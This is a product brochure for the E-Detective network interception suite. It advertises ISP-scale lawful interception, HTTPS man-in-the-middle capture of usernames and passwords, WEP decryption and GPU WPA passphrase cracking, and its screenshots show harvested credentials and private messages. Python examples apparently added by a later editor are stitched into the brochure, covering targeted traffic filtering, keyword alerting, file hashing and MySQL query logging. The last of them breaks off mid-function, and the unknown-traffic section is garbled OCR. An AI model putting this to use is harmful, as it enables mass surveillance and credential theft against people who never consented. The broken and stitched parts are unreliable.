E-Detective System
* Ethernet LAN Internet Monitoring System, Internet Auditing, Data Leakage Detection and Retention (DLDR), Record Keeping Solutions.
* Also used by Law Enforcement Agencies for Lawful Interception implemented at ISP networks and International Gateways.


E-Detective Data Guard System
* Monitor Transactions of Heterogeneous Databases (MySQL, MS SQL, Oracle DB, DB2, Sybase).
* Monitor Windows CIFS activities — MS File Sharing Activities.
* Monitor Internal Mail Servers Sent/Received — POP3, SMTP


E-Detective Data Retention & Management System
* Archived backup data from E-Detective System.
* Review, search and query backup data.
HTTPS/SSL MITM Interception System (LEA)
* Intercepting Ethernet LAN HTTPS Traffic such as HTTPS Gmail Traffic, including HTTPS username and password.
* Also used by Law Enforcement Agencies for Lawful Interception implemented at ISP network.


E-Detective Backup Server (ALL)
* Archived backup data from E-Detective System.
* Review, search and query backup data.


E-Detective Central Management System (ALL)
* Manage Multiple E-Detective Systems, ED Backup Server Systems, EDDC with Single Login GUI.
* Centralized Search/Query.
* Wi-Fi IEEE 802.11 a/b/g/n passive interception system
* Target can be an AP, a Client or an entire Channel
* Capable of decrypting WEP key
* WD x 4 Extreme Systems come with Distributed Capturing, Forbidding and Locator Functions.


WPA-PSK Password Recovery System (LEA)
* Recovery of WPA1-PSK and WPA2-PSK passphrase
* Using GPU Hardware Acceleration
* Using Smart Dictionary (Mutation)
* Using Masking (Targeted Brute Force Attack).
Integrated Interception & Real-Time Reconstruction Series


Network Investigation Toolkit — NIT (LEA)
* Ethernet LAN passive and active interception system
* Wi-Fi IEEE 802.11 a/b/g/n passive and active interception system
* For Wi-Fi passive interception, targets can be up to 4 APs, 4 Clients or 4 Channels.
* Capable of decrypting WEP key.
* WPA-PSK password recovery (optional) using WPA-PSK Password Recovery System
* Decrypting HTTPS traffic including username and password by active implementation in both LAN and Wi-Fi
* Capable of manually reconstructing the PCAP raw data files.
Decision Group Product & Solutions Overview


Offline Manual Packet Reconstruction Series 


E-Detective Decoding Centre - EDDC (ALL) / EDDC-LEMF (LEA)
* Provides Case and User Management for different Investigators and with different Cases.
* Parse and reconstruct pre-captured PCAP raw data files manually.


Forensics Investigation Toolkit — FIT (ALL)
* The only Windows Based Software Application
* Designed for single user usage.
* Parse and reconstruct PCAP raw data files manually.
Wireline Ethernet Interception & Real-Time Reconstruction Series
E-Detective System


Introduction to E-Detective System 


Wireline Ethernet Internet Monitoring, Data and Record 
Retention & Network Content Forensics Analysis 
Solution (Real-Time Reconstruction) 


Solution for:

* Organization Internet Monitoring/Network Behavior Recording
* Auditing and Record Keeping for Banking and Finance Industry
* Forensics Analysis and Investigation, Legal and Lawful Interception (LI)
* Compliance Solution for: Sarbanes Oxley Act (SOX), HIPAA, GLBA, SEC, NASD, E-Discovery etc.
E-Detective Standard System Models and Series (Appliance based)
User can also opt to purchase software license only from us and use their own hardware/server. 


FX-06 Series FX-30 Series FX-100 Series FX-120 Series 
Screenshot: Total Throughput Statistical Report (2009-02-20 13:48:22), with Store / Save / Archive stages.

E-Detective — Mirror Mode Implementation (1)

Diagram: E-DETECTIVE Mirror Mode Implementation, Real-Time Reconstruction (Organization or Corporate Network Deployment). Components: WAN Router/Firewall, Managed Switch, Server Farm, Users, Administrator (another building/department/floor).

Capture - Mirror Mode: Sniffer technology is used for capturing Internet traffic/packets through a port-mirroring switch. Mirroring needs to be done on the Managed Switch uplink port.

Manage: The management port can be connected to the core switch, allowing the Admin to access the system from a PC on the network.

* Recommended implementation.


E-Detective — Bridge Mode Implementation (2)

Diagram: E-DETECTIVE Bridge Mode Implementation, Real-Time Reconstruction. Components: Router/Firewall, E-Detective (eth) on the uplink port, Server Farm, Switch, Administrator (another building/department/floor).

Bridge mode (inline mode), where all Internet traffic will pass through E-Detective. It acts as a gateway to all Internet traffic.

* Implementation for small size networks — less than 50 online users, which do not have a port-mirror switch.


E-Detective Lawful Interception (LI) Solutions

Diagram: Solutions for Lawful Interception — Nation Wide Deployment. Law Enforcement Agencies (MICT) access the Central Management System, Reporting, Intercepted and Reconstructed Content, Search, Alert Functions etc. over a secured private network. Data traffic of 10G or more passes from the ISP IDS/Firewall and switch through an Aggregator and Distributed Taps to N x E-Detective Systems, with NAS/SAN Storage at each site; other ISP sites/states are connected in the same way.


Lawful Interception — Mass Interception (1)

* Huge amount of traffic (10 G throughput or more).

* Aggregator and Distributed Tap/Data Access Switch can be used to filter the captured traffic (10 G or more) by Domain/Subnet/IP to multiple E-Detective systems for real-time reconstruction.

* Max. reconstruction throughput handled by each E-Detective system is approximately 500 Mbps - 1 Gbps using hardware with RAID 0 configuration — 8 x HDD setup.

* A Central Management Server (CMS) is used to manage the N x E-Detective systems scattered over the central location and site locations.

* Data captured (in raw data — PCAP format, and reconstructed data) can be backed up to an E-Detective Backup Server System or NAS/SAN at each location.

* CMS is made securely accessible to Law Enforcement Agencies to monitor, query, retrieve and obtain required captured information from the various E-Detective systems deployed.


Lawful Interception — Targeted IP Interception (2)

* Smaller amount of traffic (capture and filter traffic by Targeted IP Addresses configuration).

* Aggregator and Distributed Tap/Data Access Switch can be used to filter captured traffic (10 G or more) by targeted IP Addresses before providing the filtered raw data to E-Detective systems for real-time reconstruction.

* Max. reconstruction throughput handled by each E-Detective system is approximately 500 Mbps - 1 Gbps using RAID 0 — 8 x HDD configuration. More than one E-Detective system can be deployed to handle a larger amount of traffic throughput.

* A Central Management Server (CMS) is used to manage the N x E-Detective systems scattered over the central location and site locations.

* Data captured (in raw data — PCAP format, and reconstructed data) can be backed up to an E-Detective Backup Server System or NAS/SAN at each location.

* E-Detective systems and CMS are made accessible to Law Enforcement Agencies locally or remotely (secure connection).
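The aggregator/tap stage described in the two deployments above, as an added example that is not Decision Group's own code: it filters constructed sample packets against a targeted IP/subnet list, assigns each flow to one of N reconstruction systems so that both directions of a flow reach the same system, and checks per-system load against the 500 Mbps - 1 Gbps figure stated above. The target list format, the system count and the packet fields are assumptions.

```python
# Added example (not E-Detective code): a minimal model of the aggregator /
# distributed-tap stage that filters by targeted IP/subnet and fans captured
# traffic out to N reconstruction systems.
import ipaddress
import zlib
from collections import defaultdict
from dataclasses import dataclass

# Per-system reconstruction throughput range stated in the text.
PER_SYSTEM_MAX_BPS = 1_000_000_000   # 1 Gbps upper bound
PER_SYSTEM_SAFE_BPS = 500_000_000    # 500 Mbps lower bound, used for planning


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    length: int  # bytes on the wire


class Aggregator:
    def __init__(self, targets, n_systems):
        # targets: CIDR strings or single IPs (assumed configuration format).
        self.targets = [ipaddress.ip_network(t, strict=False) for t in targets]
        self.n_systems = n_systems

    def is_targeted(self, pkt):
        # Keep a packet if either endpoint falls inside a targeted subnet.
        s, d = ipaddress.ip_address(pkt.src), ipaddress.ip_address(pkt.dst)
        return any(s in n or d in n for n in self.targets)

    def system_for(self, pkt):
        # Order-independent flow key: A->B and B->A hash to the same system,
        # so a reconstruction system sees both halves of every session.
        a, b = sorted((pkt.src, pkt.dst))
        return zlib.crc32(f"{a}|{b}".encode()) % self.n_systems

    def distribute(self, packets):
        # Returns (bytes delivered per system, number of non-targeted packets dropped).
        load = defaultdict(int)
        dropped = 0
        for p in packets:
            if not self.is_targeted(p):
                dropped += 1
                continue
            load[self.system_for(p)] += p.length
        return dict(load), dropped


def systems_needed(aggregate_bps, per_system_bps=PER_SYSTEM_SAFE_BPS):
    # Number of reconstruction systems for a given aggregate rate, planned
    # on the conservative end of the stated range (ceiling division).
    return -(-aggregate_bps // per_system_bps)


def overloaded(load_bytes, window_s, limit_bps=PER_SYSTEM_MAX_BPS):
    # Systems whose observed rate over the window exceeds the limit.
    return sorted(i for i, b in load_bytes.items() if b * 8 / window_s > limit_bps)


# Constructed sample traffic (documentation-range addresses, not real captures).
SAMPLE_TARGETS = ["10.1.0.0/16", "203.0.113.7"]
SAMPLE_PACKETS = [
    Packet("10.1.2.3", "198.51.100.9", 1500),   # targeted, outbound
    Packet("198.51.100.9", "10.1.2.3", 60),     # same flow, return direction
    Packet("192.0.2.1", "192.0.2.2", 1000),     # not targeted: dropped
    Packet("203.0.113.7", "192.0.2.5", 800),    # targeted single IP
]

if __name__ == "__main__":
    agg = Aggregator(SAMPLE_TARGETS, n_systems=3)
    load, dropped = agg.distribute(SAMPLE_PACKETS)
    print("bytes per system:", load, "dropped:", dropped)
    print("systems for 10 Gbps:", systems_needed(10_000_000_000))
```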


E-Detective Sample Screenshots - Reports

Screenshot: Total Throughput Statistical Report (Mail Report, 2009-03-30) with Daily Traffic and Weekly Traffic (2009-03-23 ~ 2009-03-30) columns for Quantity, Throughput and Report, broken down by protocol category: Email (POP3, IMAP, SMTP, Webmail Read/Sent), Chat (MSN, ICQ, Yahoo, Skype, UT Chatroom, Google Talk, IRC Chatroom), FTP, File Transfer (P2P), Online Game and HTTP Link; the Mail Report drill-down lists Date-Time, Account, Sender, Receiver, CC, Subject and Size.

Homepage - Top-Down Drill to Details Reporting


E-Detective Internet Protocols Supported

Screenshot: Gmail sign-in page in Windows Internet Explorer (HTTPS) shown as an example of reconstructed webmail, alongside supported protocol categories: File Transfer, Google Talk, Others (FTP, P2P), Online Games, Telnet etc.


Sample: Email (POP3, SMTP and IMAP)

Screenshot: mail list with columns No., Date-Time, Account, Sender, Receiver, CC, Subject, Size, Similar and Whois; a selected message is opened in Thunderbird ("FW: Football: Australia makes bid for 2018 World Cup", 2/1/2009), and the Whois panel offers Hostname query, Whois query and Google Map lookups for the source and destination IPs, with the Query Result showing the SGNIC WHOIS Server record for the source host.

Sample: Web Mail (Read and Sent)

Screenshot: webmail list with columns No., Date-Time, Account, Sender, Password, Receiver, CC, BCC, Subject, Webmail and Similar, with the reconstructed body of a selected Gmail message displayed.

Webmail Type: Yahoo Mail, Gmail, Windows Live Hotmail, Giga Mail and others


Sample: IM - Yahoo, MSN, ICQ, IRC etc.

Screenshot: MSN conversation list with columns No., Date-Time, Account, User Handle, Participants, Conversation and Count; the selected conversation shows the reconstructed messages, file transfers (e.g. Customer Request Form.pdf), audio and video sessions, and the account's Friend List.


Sample: File Transfer — FTP Upload/Download

Screenshot: FTP list with columns No., Date-Time, Account, Username, Password, Action, FTP Server IP, File Name, Size and Whois (anonymous downloads of PDF datasheets), with a downloaded PDF opened from the File Download dialog.

VOIP-DETECTIVE
* Capable to capture, decode and reconstruct VoIP RTP sessions.
* Supports SIP and H.323.
* Supported CODECS: G.711 a-law, G.711 u-law, G.729, G.723, G.726 and iLBC.
* Capable to play back VoIP sessions.


Sample: File Transfer — P2P File Sharing

Screenshot: P2P list with columns Date-Time, Account, Tool, File Name, Last Activated, Upload, Download and Detail (BitTorrent and LimeWire/4.16.6 entries); the Detail view of one BitTorrent session (2008-10-13 08:07:43, IP 192.168.10.10) lists each Upload/Download action with peer IP and port (Total 13 records).

Supports P2P such as BitTorrent, eMule/eDonkey, FastTrack, Gnutella


Sample: File Transfer — Windows CIFS

Screenshot: CIFS list with columns No., Date-Time, Account, Username, Action, Server, Path, File Name, Size, Similar and Whois (downloads from a PUB\ share on 192.168.1.111), with the downloaded archive opened in an archive viewer.

Supports Windows File Sharing Logs and Reconstruction — Tapping point must contain these data transfers.


Sample: HTTP (Link, Content and Reconstruction)

Screenshot: HTTP Link list with columns No., Date-Time, Account, Referer and Content (google.com.sg and facebook.com requests), with a reconstructed Facebook page (the E-Detective fan page by Decision Group) opened in Windows Internet Explorer from the E-Detective server.

HTTP Web Page reconstruction through proxy service


Sample: HTTP Web Upload/Download

Screenshot: HTTP Upload/Download list with columns No., Date-Time, Account, Action, File Name, URL, File Size and Similar Search (torrent, video and image downloads; a JPEG upload to Gmail), with the reconstructed image (SIA.jpg, JPEG Image, 23.2KB) shown via the File Download dialog.


Sample: HTTP Video Streaming (FLV Format)

Screenshot: Video Stream list with columns No., Date-Time, Account, Host, File Name, URL, File Size and Similar Search (ESPN, Yahoo rich media and Metacafe clips), with Playback of Video File in the E-Detective player.

Video Stream (FLV format): Youtube, Google Video, Metacafe.


Sample: HTTP Request (GET & POST)

Screenshot: HTTP Request list with columns No., Date-Time, Account, Action and URL (four GET requests to sg.yahoo.com on 2009-09-21), with the original request opened from the E-Detective server:

GET /s/269375 HTTP/1.1
Accept: */*
Referer: http://sg.yahoo.com/?p=us
Accept-Language: en-sg
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Foxy/1; SLCC1; .NET CLR 2.0
Accept-Encoding: gzip, deflate
Host: sg.yahoo.com
Connection: Keep-Alive
Cookie: Y=...

A second screenshot lists captured accounts with columns Account, User, Password, Server and Record File, filtered by Visibility Group (ALL), Total 189 records, 10 pages.


Sample: VoIP Calls (with Play Back) - Optional

Screenshot: VoIP list with columns No., Date-Time, Account, Caller, Callee, Mode, Type, Codec, File Name and Time (five peer-to-peer SIP calls using G.723, iLBC and G.729 codecs, saved as .wav files of 10 seconds to just over 1 minute).

Play back of reconstructed VoIP audio file using Media Player.
Supports SIP/H.323 RTP codecs such as G.711 a-law, G.711 u-law, G.726, G.729, iLBC.
Important features for Internet online fraud (cross border) — case studies!


Sample: Database Logging

Screenshot: SQL list (with a Password Hide option and Visibility Group filter) with columns No., Date-Time, Account, Username, Password, Server, DB Name, Command, DB Type, Similar and Whois; the captured MSSQL commands from 192.168.1.170 to 192.168.1.131 include "use de", "set textsize 64512", "Insert into pop3 ( FROM, TO, CC, BCC, SU..." and "Select count(*) From pop3" (Total 872 records, 44 pages).

Supports Database Logging - MySQL, MSSQL, Oracle etc. database commands.
Interception points must contain the database command packets.


Sample: Unknown Traffic Analysis 


Protocol ^ 


[gl Date-Time Src IP Dst IP SrcPort DstPort Src MAC Dst MAC Packets 
1m gilet 192168.112 192168885 63578 161 ` 00-1A:80:5C-5B.DE — 00:507F:29:58:11 \ 120B 4 UDP 
2. Fl sei 192.168.1.50 192.168.1255 — 138 138 00:16:67:00:3C:56 — FF-FF-FF-FF-FF-FF Mo 4 UDP 
3. grated 192168.112 192168160 7737 443 00-1A:80:5C:5B:DE — 00-0A:12:03:06:B7 K 8 TCP 
FEE 
4. s Page Layout Formulas Data Review — View a p67 DO 3 EC -E=-EE-EE-EE- / / 
|General ~ ||| Ë) Conditional Formatting || 3Insert~ | E ~ | File Download 
5. Fe) - = $ m Kä *, — asss ob 2r n | e e re een 
= T e ES "a [777 Do you want to open or save this file? E 
6. ° DATETIME 


c D E G G H I š IE Name: UNKNOWN-20030101 xls 
Screenshot: Unknown-protocol capture list. Columns are Date-Time, Source IP, Destination IP, SPORT, DPORT, SMAC, DMAC, Packets, Size (Byte) and Protocol. The example rows are TCP sessions from 192.168.1.12 to 192.168.1.60 on destination port 443 (client ports 7386 to 7432, each between about 1.3 and 3.9 KB) plus one session to 60.251.127.208; the list holds 174 records over 9 pages. A browser download prompt for an exported Excel 97-2003 worksheet is overlaid on the list.


Note: turn on the Unknown Capturing Module if necessary; it is off by default.


Admin: System Access Authority Assignment 


Authority: visibility and operation rights are defined per group (groups are user defined)

Screenshot: authority assignment form. Section 1, Authority - Visibility, takes a visibility group name and its default rules, with a choice between "all non-visual" and "all visual" plus listed exceptions. Section 2, Authority - Operation, takes an operation group name and a rule per function (record, statistics, network, account, schedule, information, full text, data association, HTTP reconstruct, game, notification); each function can be set to no visibility, read-only recorded record, can read recorded content, can read set content, or can read and write (including deleting settings). Per-IP and per-account visibility exceptions can be added or deleted.

The user group list below shows four groups with their creation time and Add User / Delete actions: Administrator (2008-12-19 11:44:16), Technical (2009-02-02 18:24:07), Finance (2009-02-02 18:32:58) and Logistics (2009-02-02 18:33:19).


Export & Backup — Auto (by FTP) and Manual 


Screenshot: backup settings. Manual backup can be scheduled by hour, day, week or month, and the system warns that at least 700 MB of free disk space is required. Existing backup directories are listed with their size and ISO image name (three directories from 10 to 13 October 2008, 11M to 46M each). The service categories to include are selectable (POP3, SMTP, IMAP, WEBMAIL-R, WEBMAIL-S, MSN, ICQ, YAHOO, QQ, UT, SKYPE, IRC, GOOGLETALK, FTP, P2P, GAME, HTTP-L, HTTP-C, HTTP-D, VIDEO STREAM, TELNET), and recorded data older than a configurable number of days can be deleted once backed up. The backup ISO image can be downloaded with an FTP client (login account "admin") or burned to CD/DVD (an Optiarc DVD RW AD-7530B drive is shown). Auto (FTP) backup has an ON/OFF switch, an FTP host (192.168.10.50 in the example), user and password fields and an "FTP test" button; when it is on, the ISO image is uploaded to the FTP server and then deleted from the E-Detective system. The backup contains the reserved raw data files together with the reconstructed data (Backup Record: Download).

Hashed Export Function


Alert and Notification — Alert with Content 


Screenshot: alert list and "Create a New Alert" form. The list holds two rules: a POP3 keyword rule ("CEO, Managing Director, Gen…") and an SMTP keyword rule ("Price list.xls"), both forwarded to frankie@ed-system.sg. The form has one row per service category (IMAP, SMTP, WEBMAIL-R, WEBMAIL-S, MSN, YAHOO, ICQ, QQ, UT, SKYPE, GOOGLETALK, IRC, FTP, GAME, HTTP-L, HTTP-C and others), each with a parameter selector (sender, key word, user account or IP), a time window (08:00 to 17:00 in the example), an Allow/Deny choice and a forward-to address.

Alerts can be configured per service category with different parameters such as keyword, account or IP, and sent to the administrator by email or by SMS (if an SMS gateway is available).

A throughput alert function is also available.
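The rule matching the alert form describes is simple enough to write down. The following is an added example (not E-Detective code) of how such rules are evaluated: each rule names a service category, the parameter inspected (keyword list, sender, account or IP), an active time window and a forward-to address, and each reconstructed record that matches a rule inside its window produces one notification. The rule values are the two rules visible in the alert list; the records, the field names and the Allow/Deny semantics (not modelled here) are assumptions made for the example.

```python
from dataclasses import dataclass
from datetime import datetime, time
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class AlertRule:
    service: str      # category the rule applies to: "POP3", "SMTP", "MSN", ...
    param: str        # what is inspected: "keyword", "sender", "account" or "ip"
    value: str        # comma-separated keywords, or one sender/account/IP
    start: time       # active window start (inclusive)
    end: time         # active window end (inclusive)
    forward_to: str   # administrator mailbox (SMS gateway not modelled here)


@dataclass(frozen=True)
class Record:
    """One reconstructed item, whatever the service (assumed field set)."""
    service: str
    timestamp: datetime
    account: str
    sender: str
    src_ip: str
    subject: str = ""
    body: str = ""
    attachments: Tuple[str, ...] = ()


def in_window(rule: AlertRule, ts: datetime) -> bool:
    t = ts.time()
    if rule.start <= rule.end:
        return rule.start <= t <= rule.end
    return t >= rule.start or t <= rule.end   # window that crosses midnight


def matches(rule: AlertRule, rec: Record) -> bool:
    if rule.service != rec.service or not in_window(rule, rec.timestamp):
        return False
    if rule.param == "keyword":
        # keywords are matched case-insensitively against subject, body and attachment names
        hay = " ".join([rec.subject, rec.body, *rec.attachments]).lower()
        needles = [k.strip().lower() for k in rule.value.split(",") if k.strip()]
        return any(k in hay for k in needles)
    if rule.param == "sender":
        return rule.value.lower() == rec.sender.lower()
    if rule.param == "account":
        return rule.value.lower() == rec.account.lower()
    if rule.param == "ip":
        return rule.value == rec.src_ip
    raise ValueError(f"unknown rule parameter {rule.param!r}")


def evaluate(rules: List[AlertRule], records: List[Record]) -> List[Dict[str, str]]:
    """Return one notification dict per (rule, record) hit, in record order."""
    alerts = []
    for rec in records:
        for rule in rules:
            if matches(rule, rec):
                alerts.append({
                    "to": rule.forward_to,
                    "service": rec.service,
                    "account": rec.account,
                    "rule": f"{rule.param}={rule.value}",
                    "when": rec.timestamp.isoformat(timespec="seconds"),
                    "subject": rec.subject,
                })
    return alerts


# The two rules shown in the alert list, with the 08:00-17:00 window from the form.
RULES = [
    AlertRule("POP3", "keyword", "CEO, Managing Director", time(8, 0), time(17, 0), "frankie@ed-system.sg"),
    AlertRule("SMTP", "keyword", "Price list.xls", time(8, 0), time(17, 0), "frankie@ed-system.sg"),
]

# Constructed sample records (not captured data from the page).
RECORDS = [
    Record("SMTP", datetime(2009, 2, 2, 9, 15), "lunko", "lunko@decision.com.tw", "192.168.1.9",
           subject="Q1 figures", attachments=("Price list.xls",)),
    Record("SMTP", datetime(2009, 2, 2, 19, 30), "lunko", "lunko@decision.com.tw", "192.168.1.9",
           subject="Q1 figures", attachments=("Price list.xls",)),      # outside the window
    Record("POP3", datetime(2009, 2, 2, 10, 5), "vic", "hr@example.invalid", "192.168.1.10",
           subject="Note from the managing director"),
    Record("MSN", datetime(2009, 2, 2, 10, 6), "peter", "peter", "192.168.1.142",
           body="sending you the price list.xls now"),                 # no MSN rule
]

if __name__ == "__main__":
    for a in evaluate(RULES, RECORDS):
        print(a)
```

Two of the four constructed records produce a notification; the evening SMTP message is dropped by the time window, and the MSN chat is ignored because no MSN rule exists. Keyword rules here are plain substrings; a real deployment would also want word boundaries and a cap on notification volume so a chatty sender cannot flood the administrator's mailbox.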


Search — Free Text, Condition, Association 


Complete Search — Free Text Search, Conditional Search, Similar Search 


Screenshot: search pages (Search All). Conditional search takes a date/time range, a search category (All or one service), source IP, email address (sender, receiver, CC, BCC), subject, webmail type, FTP server and FTP user, P2P tool, game name, and MSN, ICQ, Yahoo and QQ accounts (by user handle or participants); a history of previous queries is kept. The result list shows date-time, account, sender, receiver, CC, subject and size (563 results over 38 pages in the example) and can be grouped by IP or by account. Association search starts from one account and lists the related accounts (for example jimmy@decision.com.tw, jylin@decision.com.tw, lunke@decision.com.tw, neoyuxxx@decision.com.tw) and related IPs and user names (192.168.1.237, jimmy, bob, tang0126). Free text search is also provided.


File Checksum (Hash) — Check File Content Integrity 


Screenshot: file checksum page. The captured file list shows file name, extension, count and size (for example ni-ieee.pdf, 334.83K; network forensics on pack….pdf, 240.91K; TUT186-Forensics.pdf, 884.64K; 0409s2.pdf, 460.29K; and a 33.63M .rar archive). Searching by the checksum of an imported file (TUT186-Forensics.pdf in the example) returns the single matching captured file.


The page shows the list of captured files; the user can import a file and compare its checksum with those of the files captured by the system.

Comparing file content rather than file names catches the case where an abuser renames a confidential file before sending it to a competitor: the hash of the content does not change with the name.
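The check above is a content-hash lookup. As an added example (not E-Detective code), the block below hashes captured files with SHA-256, indexes them by content hash, and looks up a reference file by its bytes, so a copy sent under another name is found while an edited copy is not. The file names and contents are constructed for the demo; the hash algorithm used by the product is not stated on the page.

```python
import hashlib
import io
from dataclasses import dataclass
from typing import BinaryIO, Dict, Iterable, List


@dataclass(frozen=True)
class CapturedFile:
    """One file reconstructed from a captured session: the name as sent and its bytes."""
    name: str
    data: bytes


def hash_stream(stream: BinaryIO, chunk_size: int = 1 << 20) -> str:
    """SHA-256 of a file-like object, read in chunks so a large capture
    (such as the 33 MB archive in the list above) never sits in memory at once."""
    h = hashlib.sha256()
    for block in iter(lambda: stream.read(chunk_size), b""):
        h.update(block)
    return h.hexdigest()


def sha256_hex(data: bytes) -> str:
    return hash_stream(io.BytesIO(data))


def build_hash_index(captured: Iterable[CapturedFile]) -> Dict[str, List[str]]:
    """Map content hash -> every name under which that exact content was seen."""
    index: Dict[str, List[str]] = {}
    for f in captured:
        index.setdefault(sha256_hex(f.data), []).append(f.name)
    return index


def find_by_content(index: Dict[str, List[str]], reference: bytes) -> List[str]:
    """Return the captured names whose bytes equal the reference file.
    A renamed copy matches; a re-saved or edited copy does not."""
    return index.get(sha256_hex(reference), [])


# Constructed sample data (not from the page): a confidential price list and
# three captured files, one of which is that list sent under a harmless name.
PRICE_LIST = b"SKU,Unit price\nA100,12.50\nA200,8.75\n"
CAPTURED = [
    CapturedFile("TUT186-Forensics.pdf", b"%PDF-1.4\n%fake pdf body\n"),
    CapturedFile("holiday_photos.jpg", PRICE_LIST),                   # renamed exfiltration
    CapturedFile("price_list_v2.csv", PRICE_LIST + b"A300,3.10\n"),   # edited copy: no match
]


def main() -> None:
    index = build_hash_index(CAPTURED)
    hits = find_by_content(index, PRICE_LIST)
    print("reference sha256:", sha256_hex(PRICE_LIST))
    print("captured under names:", hits or "no match")


if __name__ == "__main__":
    main()
```

An exact hash only finds byte-identical copies; a file that was opened and saved again, or that had one row added, hashes differently, which is why the edited copy above is not reported. Catching near-copies needs a similarity hash or content inspection rather than a checksum.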


Bookmark Function (for Review & Retrieval Later) 


Screenshot: bookmark list. Bookmarked items are listed with date-time, account, sender, receiver, CC, subject and size (20 items over 3 pages in the example), and the export list shows exported bookmark sets with date, name and export ISO name (decision, 2009-02-02 18:43:34; singapore, 2009-02-02 18:43:19).

Items can be bookmarked for later review, and bookmarked items can also be exported.


Reporting — Network Service Usage - Daily 


Screenshot: Network Services Usage Report (daily). A pie chart breaks the day's traffic down by service (HTTP Link 33.66%, HTTP Content 32.91%, UT 10.6%, MSN 8.63%, HTTP Download 4.06%, QQ 3.2%, and others). Clicking a slice drills down to the underlying record list, here the HTTP Link list with date-time, account and host (Seednet Webmail, ICQ, YouTube, and so on), 57,795 records over 2,890 pages on 2009-08-29.

Drill-down reporting capabilities.
Reporting — Network Service Usage - Weekly

Screenshot: Network Services Usage Weekly Report for 2009/08/23 to 2009/08/29 (HTTP page traffic per day), with the same drill-down into the record list: date-time, account and content (for example www.freeworldgroup.com, PChome, pagead2.googlesyndication.com), 56,971 records over 2,849 pages, and a WhoIs lookup per entry.

Drill-down reporting capabilities.


Reporting — Top Websites Viewed (Users) 


Screenshot: Top Web Sites (weekly summary), ranked by URL count per web server, for example mail.pchome.com.tw 3,305; webmail.seed.net.tw 1,380; www.google.com.tw 1,362; tw.youtube.com 1,311; www.flickr.com 1,310; www.freeworldgroup.com 828. A Top N link per site lists the users (by IP or by account) behind the count, and the "Relationship between Account and IP" view (for example 192.168.1.33 with 9,660 and 192.168.1.10 with 7,075 requests) links to each user's daily and weekly usage.

Reporting — Online IP — Account Lists 


Screenshot: Online IP List for visibility group ALL, with status, user IP, client search, server search, PC name, account and last connection time (for example 192.168.1.19, PC name DECISION-CASPER, last seen 2011-07-27 15:05:14; several public IPs such as 116.14.50.39, 211.21.62.67 and 46.137.134.188 on 2011-07-26). Functions: Add/Delete, Set IP, Import/Export IP, Skipped IP List, Search, Account Detection and Mail Report. The per-IP Throughput Month Statistical report (192.168.1.2, 2011-07) lists quantity and throughput per service (1,751 items, 148,080 KB in total), with the mail and chat services mostly at zero.

Reports — Daily Excel Log Report (Packet Header) 


Screenshot: daily Excel log report (20110727, opened in Microsoft Excel compatibility mode). The Summary sheet lists quantity and throughput per category (POP3 1022 / 276,569 KB; IMAP 476; SMTP 541; Webmail (Read) 1674; Webmail (Sent) 751; MSN 10; ICQ 2; YAHOO 3; QQ 7; SKYPE 2; UT Chat Room 1; IRC Chat Room 2; FTP 522; P2P 6; Telnet 137; HTTP Content 57,424; Video Stream 713; HTTP Request 0; VOIP 0; Facebook 273; Twitter 204; Plurk 204). The per-service sheets (POP3, IMAP, SMTP, Webmail (Read), Webmail (Sent), MSN, ICQ, YAHOO, QQ, SKYPE, …) hold the packet-header level records: date, IP address, hostname, from, to, CC, BCC and subject, for example mail from 192.168.1.33 (flyy), 192.168.1.10 (vic) and 192.168.1.9 (lunko) on 27/7/2011 between 14:24 and 15:04, including one "[May Infected] Mail delivery failed" bounce.
Wireline Ethernet Interception & Real-Time Reconstruction Series
E-Detective Data Guard System (ED-GS)


Introduction to ED-GS: For Internal Auditing

> Enterprise Protection from Confidential Business Data Breach
> Intranet Deployment at the Gateway of the Server Farm Network Segment
> Monitor Transactions of Heterogeneous Databases (MySQL, MS SQL, Oracle DB, DB2, Sybase)
> Monitor File Access Activities of File Servers in an MS Network (CIFS)
> Monitor Internal Email Activities (POP3, SMTP, IMAP)
> Transaction Records Provided for Audit
> Fulfilment of Personal Data Protection Mandates


Introduction to ED-GS Features

> DB Monitor on Transactions of MySQL, MS SQL Server and Oracle DB
» SQL Command and Action Record with DB Name, Network and DB User Account, User IP, Date/Time Stamp

> Internal Email Activity Monitor & Audit
» Email Content with Sender, CC & BCC List, User IP, Date/Time Stamp and Attached Files

> Access Record and Audit of File Servers
» File Access Record with User Account, IP, File Server Name, Action, Date/Time Stamp

> Full Text Search and Cross-Check
» Online Warning Trigger by Keyword
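The DB monitor feature reconstructs the SQL command, DB name, user IP and timestamp from mirrored traffic. As an added example (not ED-GS code), the block below does that for the MySQL client-to-server wire protocol: it splits a captured byte stream into MySQL packets (3-byte little-endian length, 1-byte sequence id, payload), remembers the schema each client selected via COM_INIT_DB, and turns every COM_QUERY into an audit record with the statement's leading verb as the action. Assumptions: the classic COM_QUERY layout with no query attributes, a plaintext (non-TLS) session, and that TCP reassembly of the mirror-port capture has already happened; the sample stream is constructed from the statements visible in the SQL log screenshot later on the page.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple

COM_INIT_DB = 0x02   # "USE <schema>" as sent by the client library
COM_QUERY = 0x03     # a text SQL statement

ACTION_RE = re.compile(
    r"^\s*(SELECT|INSERT|UPDATE|DELETE|DROP|ALTER|CREATE|GRANT|TRUNCATE)\b", re.I)


@dataclass(frozen=True)
class SqlRecord:
    timestamp: str
    client_ip: str
    server_ip: str
    db_name: str
    action: str      # first verb of the statement, or the command name
    statement: str


def iter_mysql_packets(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Split a client-to-server byte stream into MySQL packets.
    Layout: 3-byte little-endian payload length, 1-byte sequence id, payload."""
    off = 0
    while off + 4 <= len(data):
        length = int.from_bytes(data[off:off + 3], "little")
        seq = data[off + 3]
        payload = data[off + 4:off + 4 + length]
        if len(payload) < length:
            break                      # truncated: wait for the next TCP segment
        yield seq, payload
        off += 4 + length


class MySqlSessionLogger:
    """Turns captured client->server payloads into audit records, remembering the
    schema each (client, server) pair selected so every statement carries a DB name."""

    def __init__(self) -> None:
        self.current_db: Dict[Tuple[str, str], str] = {}

    def process(self, ts: str, client_ip: str, server_ip: str, data: bytes) -> List[SqlRecord]:
        key = (client_ip, server_ip)
        out: List[SqlRecord] = []
        for _seq, payload in iter_mysql_packets(data):
            if not payload:
                continue
            cmd, body = payload[0], payload[1:]
            if cmd == COM_INIT_DB:
                db = body.decode("utf-8", "replace")
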